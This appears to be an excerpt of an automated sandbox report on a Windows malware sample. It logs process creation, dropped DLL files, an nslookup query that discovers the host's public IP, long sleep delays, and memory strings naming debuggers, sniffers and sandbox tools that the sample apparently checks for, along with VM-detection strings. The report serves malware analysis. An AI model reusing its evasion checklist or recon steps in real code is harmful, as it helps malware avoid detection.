Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES2F3F.tmp' 'c:\Users\user\AppData\Local\Temp\41myt1z4\CSC9757D2D6F9F84ABABCD57DA7E4EFF939.TMP'	Jump to behavior
Source: C:\Windows\System32\control.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4817.tmp' 'c:\Users\user\AppData\Local\Temp\dvgqxizg\CSC2062E18B5949488FB5158C917D4EBA9.TMP'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9047.bi1'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.492591062.000001FA6F020000.00000002.00000001.sdmp, csc.exe, 0000001D.00000002.502090814.000001E94A380000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000001F.00000000.546622273.0000000007BA0000.00000002.00000001.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 0000001C.00000002.563779176.0000027A71BDC000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 0000001C.00000002.563779176.0000027A71BDC000.00000004.00000040.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000001F.00000000.546622273.0000000007BA0000.00000002.00000001.sdmp

Source: C:\Windows\System32\control.exe	Code function: 28_2_00BD4DCD push 3B000001h; retf		28_2_00BD4DD2
Source: C:\Windows\explorer.exe	Code function: 31_2_04DE4DCD push 3B000001h; retf		31_2_04DE4DD2

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\dvgqxizg\dvgqxizg.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\earmark.avchd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.dll	Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX

Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.372274331.0000011E59A96000.00000004.00000001.sdmp	Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.372274331.0000011E59A96000.00000004.00000001.sdmp	Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.372274331.0000011E59A96000.00000004.00000001.sdmp	Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.373966707.0000011E59A7B000.00000004.00000001.sdmp	Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.372274331.0000011E59A96000.00000004.00000001.sdmp	Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.373966707.0000011E59A7B000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000003.340990984.0000011E5A552000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXETEM5~'
Source: wscript.exe, 00000000.00000003.373966707.0000011E59A7B000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.373966707.0000011E59A7B000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000003.373966707.0000011E59A7B000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.372274331.0000011E59A96000.00000004.00000001.sdmp	Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.373966707.0000011E59A7B000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.373966707.0000011E59A7B000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.373966707.0000011E59A7B000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXEH
Source: wscript.exe, 00000000.00000003.373966707.0000011E59A7B000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXE@
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.373966707.0000011E59A7B000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.372274331.0000011E59A96000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000003.373966707.0000011E59A7B000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000003.373966707.0000011E59A7B000.00000004.00000001.sdmp	Binary or memory string: SBIECTRL.EXE@
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.373966707.0000011E59A7B000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.373966707.0000011E59A7B000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.372274331.0000011E59A96000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.372274331.0000011E59A96000.00000004.00000001.sdmp	Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.375722028.0000011E59A94000.00000004.00000001.sdmp	Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.373966707.0000011E59A7B000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE
Source: wscript.exe, 00000000.00000003.372274331.0000011E59A96000.00000004.00000001.sdmp	Binary or memory string: DUMPCAP.EXE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3918			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1310			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dvgqxizg\dvgqxizg.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\earmark.avchd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.dll	Jump to dropped file

Source: C:\Windows\System32\wscript.exe TID: 7140	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5900	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5584	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation			Jump to behavior

Source: explorer.exe, 0000001F.00000000.547723388.00000000083E9000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000001F.00000000.547778896.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: wscript.exe, 00000000.00000002.381417471.0000011E5CEA0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.533603589.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001F.00000000.536533851.0000000006419000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.535669097.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWPackages
Source: explorer.exe, 0000001F.00000000.547723388.00000000083E9000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: control.exe, 0000001C.00000002.563204959.0000027A6FD67000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: explorer.exe, 0000001F.00000000.536533851.0000000006419000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.547816387.0000000008455000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001F.00000000.547497490.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: wscript.exe, 00000000.00000002.381417471.0000011E5CEA0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.533603589.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.381417471.0000011E5CEA0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.533603589.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001F.00000000.547497490.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000001F.00000000.547778896.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: wscript.exe, 00000000.00000002.381417471.0000011E5CEA0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.533603589.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
